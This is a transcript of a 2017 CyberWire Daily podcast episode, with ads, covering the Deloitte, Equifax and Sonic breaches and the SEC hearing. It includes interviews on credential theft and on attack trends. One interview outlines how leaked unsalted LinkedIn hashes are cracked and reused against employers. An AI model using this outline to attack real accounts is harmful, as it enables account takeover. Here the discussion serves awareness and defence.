CyberWire Daily - Deloitte and Equifax under the microscope. Congress grills the SEC. Credential theft trends.
Episode Date: September 28, 2017Deloitte and Equifax continue to find themselves under scrutiny, but we should all resist the urge to chase Ambulances. The SEC commissioner gets a grilling form congress, and we can't help wonder... if his Spidey sense was tingling. Chances are your credentials aren't as secure as you'd like them. Dale Drew from Level 3 Communications on attack patterns and lulls. Trip Nine from Comodo on credential theft trends. And Pyongyang is perched on a pile of coal. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K.
Air Transat presents two friends traveling in Europe for the first time and feeling some pretty big emotions.
This coffee is so good. How do they make it so rich and tasty?
Those paintings we saw today weren't prints. They were the actual paintings.
I have never seen tomatoes like this.
How are they so red?
With flight deals starting at just $589,
it's time for you to see what Europe has to offer.
Don't worry.
You can handle it.
Visit airtransat.com for details.
Conditions apply.
AirTransat.
Travel moves us.
Hey, everybody.
Dave here.
Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try Delete.me.
I have to say, Delete.me is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
Delete.me's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for Delete.me.
Now at a special discount for our listeners.
private by signing up for Delete Me. Now at a special discount for our listeners,
today get 20% off your Delete Me plan when you go to joindeleteme.com slash n2k and use promo code n2k at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash N2K, code N2K.
Deloitte and Equifax continue to find themselves under scrutiny,
but we should all resist the urge to chase ambulances.
The SEC commissioner gets a grilling from Congress,
and we can't help wonder if his spidey sense was tingling.
Chances are your credentials aren't as secure as you'd like them to be,
and Pyongyang is perched on a pile of coal.
I'm Dave Bittner in Baltimore with your CyberWire summary for Thursday, September 28, 2017.
Deloitte continues to deal with the consequences of its recently disclosed breach.
Many of those consequences are foreseeable piling on, as lawyers see with some justification,
regulatory gaps exposed by the incident, and as security researchers put the Big Four consultancy under the microscope
and find all sorts of places where the company hasn't followed its own advice. by the incident, and as security researchers put the Big Four consultancy under the microscope
and find all sorts of places where the company hasn't followed its own advice.
Those include proxy login credentials out on Google+, VPN credentials on GitHub, thousands
of hosts exposed on the internet, as seen on Shodan searches, and so forth.
Such results are practically inevitable for an
organization as big as Deloitte, which may or may not be comforting. There's no further word on
whether the breach is more damaging than Deloitte's initial minimalist characterization makes it out
to be, but the company and similar organizations are sure to receive a great deal of scrutiny in
the coming weeks. Turning to the other two high-profile breaches, the Equifax incident produces fresh waves
of hand-wringing and learned helplessness over the use of Social Security account numbers
as elements of identity management approaches.
Those old enough to remember getting their first Social Security card may also remember
the advice prominently printed on the card, not intended for purposes of identification.
So it seems the new dealers who set the social security system up under President Roosevelt
may have seen something like this coming back in the 1930s, and we forgot their sound advice
somewhere circa 1995. As Chesterton said in Advice to Reformers, if you come across a fence whose purpose you don't understand,
wait until you know that purpose before you decide to tear the fence down.
The biggest lesson emerging from Equifax is the importance of sound incident response preparation,
especially with respect to disclosure and public communication.
Federal News Radio offered some good advice on this.
Quote, first, go public with
breaches as soon as you can. Otherwise, it looks like you're covering up. Crappy cyber practices
eventually come to light anyhow. You don't need a 5,000-a-day crisis management expert to tell you
that. Second, realize that bad cybersecurity is as inimical to your job as crashing the mission.
End quote. The Equifax mess has apparently also prompted what Palo Alto Networks deplores as ambulance chasing.
Palo Alto CEO Mark McLaughlin explained to Jim Cramer on Mad Money
that ambulance chasing means approaching a hacking victim
and telling them that you've got the solution that would have kept them out of trouble
if only they'd been smart enough to hire you.
McLaughlin said, quote,
What happens when you have major breaches like this?
First thing is, we don't chase the ambulance.
Nobody in companies appreciates that.
So if your security company's dialing in the next day saying,
First of all, I could definitely have stopped that for you,
or something along those lines,
you're going to be ignored.
After the fire is out, and you're thinking about the architectural design for the future, And that's probably advice worth considering for anyone in the security sector.
For better or worse, passwords are still fairly ubiquitous when it comes to online credentials.
How you choose them and how you store them can make all the difference in the world, especially with large databases of breached
passwords readily available on the dark web. Trip9 oversees the Threat Intelligence Programs
Division at Komodo, and he shares some of the credential compromise trends they've been seeing.
Everyone's familiar with a lot of the big breaches, LinkedIn, Dropbox, Adobe. However,
what a lot of people aren't familiar with is how hackers are using, let's say LinkedIn, for example,
in 2017. We're seeing most of those hashes cracked since they were unsalted MD5 hashes.
And it's very easy to uncover the plaintext passwords and also search for particular employees in an
organization. So that third party we're seeing do a lot of damage. It's kind of a weird side door
that hackers are using to get into organizations. Take us through exactly how does that work?
Okay. So what a hacker would be able to easily get a hold of is 170 million records,
to easily get a hold of is 170 million records, LinkedIn records, I should say, on the torrent network. They would just query for particular domains, for example, company ABC. And then from
that, they get the MD5 hash associated with that email address. And they would just take that over
to a cracking site like hashkiller.co.uk, entered in, and near 100% of the time,
that hash will be cracked.
And they'll find the actual plain text password
for that employee.
And then they can use that to brute force attack
the organization.
The way that most people deal with their passwords
is they'll use the same phrase over and over again,
maybe modify one or two characters,
but it becomes very easy to
reverse engineer and figure out what the present day password is.
One of the things that you study is password psychology. That's something that's interesting
to me. How do people go about choosing their passwords and what are some of the common
mistakes they make? Well, most people in my own research only use two or three variations of the same word over and over again for years.
And what they'll do is when they're forced to change their password, they will just, if they have a numeric character in their password, they'll just go up one digit.
And what that tells a hacker is, you know, for a third-party data breach that might have happened a year or two back, they know that they can just count down in digits to try to brute force into a particular application.
What are some of the other techniques that you see in common use? in contrast to third-party attacks. We're seeing a particular piece of malware called the Pony Exploit,
which has been around for a few years,
but we're seeing it become more and more advanced.
It's very well engineered through botnet attacks.
We're seeing it just wreak havoc on enterprise organizations.
In fact, any U.S. enterprise organization, over 1,000 employees,
we usually find records, stolen records from pony exploits near 100% of the time. And that could be their customers, that could be their
vendors, their partners, or their internal employees. And so how do people find themselves
infected with this? We're seeing a lot of companies that we talk with, they had no idea
that their director of HR, it was a phishing attack on them. But the malware itself, it's not
like ransomware where you got the skull and crossbones that come up and demand money.
These silently just go in and they take copies of actual credentials that are stored inside of the
browser and then they exfiltrate it. Sometimes the code has an
auto-delete functionality built into it, so it leaves without a trace. Some of it is advanced
enough to really evade more legacy endpoint detection. So what is your advice for folks to
protect themselves against these kinds of things? First piece of advice would be not to store your
passwords inside of Google Chrome, at least right now, or Internet Explorer or Firefox. Most browser-based password managers
are very vulnerable. I would recommend LastPass or another password manager that has more security.
And also these particular types of exploits, they don't know how to look into those files of those third-party password managers.
There's no localized copies of the password stored onto the machine.
I see.
So be very careful about what passwords you store inside of a browser.
That's Trip 9 from Komodo.
Turning to the Securities and Exchange Commission, the U.S. Senate has been hearing from, and more importantly talking to, the Commissioner this week.
They've given him a grilling over the Edgar breach the SEC recently disclosed, but the Senators have also been giving them some direction.
The upper chamber is uneasy about the SEC's coming regulatory regime, the Consolidated Audit Trail National Market System, CAT-NMS. This system is
designed to enable auditors to track all trading activity in the U.S. equity and options market.
It will encompass the exchanges, other federal regulatory agencies, and industry bodies as well,
and it appears to turn the financial sector into a panopticon for all of its participants,
from Wall Street to Main Street.
As Senator Mike Crapo, a Republican from Idaho, pointed out to the SEC Commissioner,
that's great power and great responsibility, so they'd better get it right. You don't have to be
J. Jonah Jameson to think that the Edgar breach suggests the SEC won't do as well as Peter Parker.
The breach of Sonic remains under investigation.
Sonic, of course, is the chain of drive-ins headquartered in Oklahoma
that has almost 3,600 locations in North America.
It appears that the incident might be linked to the roughly 5 million pay cards
that just turned up in the Joker's Stash, a dark web market run by and for carters.
Fast food restaurants handle a lot of pay cards, which makes them attractive targets.
Since last year, Chipotle, Wendy's, and Arby's have all been hit.
North Korea's got a lot of coal it can't sell.
Coal has been the DPRK's principal export for some time.
We hear that they're sitting on $9.7 trillion worth of the stuff.
That's trillion with a T.
Anyone who's got anything worth stealing online
should look to their defenses.
Pyongyang's especially interested
in cryptocurrency wallets these days,
and those nuclear and ballistic missile programs
aren't going to pay for themselves.
Calling all sellers.
Salesforce is hiring account executives to join us on the cutting edge of technology.
Here, innovation isn't a buzzword.
It's a way of life.
You'll be solving customer challenges faster with agents,
winning with purpose, and showing the world what AI was meant to be.
Let's create the agent-first future together.
Head to salesforce.com slash careers to learn more.
Do you know the status of your compliance controls right now? Like, right now? We know
that real-time visibility is critical for security, but when it comes to our GRC programs,
we rely on point-in-time checks. But get this, more than 8,000 companies like Atlassian and Quora
have continuous visibility into their controls with Vanta. Here's the gist. Vanta brings automation
to evidence collection across 30 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows
like policies, access reviews, and reporting,
and helps you get security questionnaires done
five times faster with AI.
Now that's a new way to GRC.
Get $1,000 off Vanta
when you go to vanta.com slash cyber.
That's vanta.com slash cyber for $1,000 off.
In a darkly comedic look at motherhood and society's expectations,
Academy Award-nominated Amy Adams stars as a passionate artist
who puts her career on hold to stay home with her young son.
But her maternal instincts take a wild and surreal turn
as she discovers the best yet fiercest part of herself.
Based on the acclaimed novel,
Night Bitch is a thought-provoking and wickedly humorous film
from Searchlight Pictures.
Stream Night Bitch January 24 only on Disney+. And now, a message from Black Cloak.
Did you know the easiest way for cyber criminals to bypass your company's defenses
is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform Thank you. Protect your executives and their families 24-7, 365 with Black Cloak. Learn more at blackcloak.io.
Joining me once again is Dale Drew. He's the Chief Security Officer at Level 3 Communications.
Dale, good to have you back. You wanted to talk today about some
patterns that you have noticed and wondering if maybe we're in a lull before a storm. What do
you want to share with us here? Yeah, so my goal is not to carry the sign that says this is the
end of the world. However, there was a study just released by CNN that says that 4% of surveyed Americans were worried about the eclipse.
So I want to be careful in the language I choose not to alarm anybody.
But, you know, I think our concern is from a trend perspective.
If you look at some of these massive global events, cybersecurity events that have occurred.
About five years ago, we would have a massive security event once every four to five years.
And how would you define massive?
What I would say is something that impacts probably more than three to four countries at a time.
And so from an internet service provider perspective, our sort of issues were when there was a major defect with a routing provider.
For companies, it was if there was a major defect that affected all versions of Windows or all versions of Unix and they were all publicly exposed.
You knew what every security organization was doing because everyone had to sort of group together to figure out how to block and tackle and then patch and prevent during those sort of times.
And we'd see those every four to five years. About three years ago, we saw a trend where that
was happening roughly every 18 months. Bad guys were being more diligent in researching really,
really old code.
And the nation states do it because the nation states want to find exposures that have the most access across the internet infrastructure or the corporate infrastructure.
Bad guys are learning from those techniques,
and they're also researching really, really old internet code
and really, really old operating system code
to find a way
to have as much accessible infrastructure as they possibly can, either for infrastructure capability.
You know, I want to build a huge botnet access to data. The more systems I have, the more PII and
confidential information I can find or for extortion. I'm going to you know, we've seen a
huge surge with WannaCry and Petya of spam ransomware. I'm going to, you know, we've seen a huge surge with WannaCry and Petya of spam ransomware.
I'm going to encrypt 600,000 machines at once and then ask for $300.
And if I get 10% of the people respond, that's better than a targeted attack against a few corporations.
So our biggest fear is in the first half of 2017, we've already had two major global security events that have impacted, in one case, hundreds of thousands of victims, the other case, tens of thousands of victims.
And so we're definitely seeing a shift in the professional bad guys employing more and more nation state techniques to be able to gain access to more infrastructure.
more infrastructure. This is something that from a, you know, what do you do perspective,
this is something that really is going to rely on more vendors to make sure that they review their embedded code to look for those exposures the same way the bad guys are and hopefully find
it faster. And for companies and corporations and network providers to spend more diligence
in protecting their infrastructure, having a patch process so that
when an exposure does come, you know how to block access to it, patch it, and prevent it,
and to stay diligent on people who are trying to access that infrastructure. So when you can't
prevent, you have to monitor. So diligence, I think, is the key in the coming months and
coming years. All right. Dale Drew, thanks for joining us. That's why we're thrilled to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how a default-deny approach can keep your company safe and compliant.
Well, look no further, honey, because Sunwing's Best Value Vacays has your budget-friendly escapes all the way to five-star luxury.
Yes, you heard correctly. Budget and luxury all in one place.
So instead of ice scraping and teeth chattering, choose coconut sipping and pool splashing.
Oh, and book by February 16th with your local travel advisor or at... that's the cyber wire we are proudly produced in maryland by our talented team
of editors and producers i'm dave bittner thanks for listening Thank you. With Domo, you can channel AI and data into innovative uses that deliver measurable impact.
Secure AI agents connect, prepare, and automate your data workflows,
helping you gain insights, receive alerts, and act with ease through guided apps tailored to your role.
Data is hard. Domo is easy.
Learn more at ai.domo.com.
That's ai.domo.com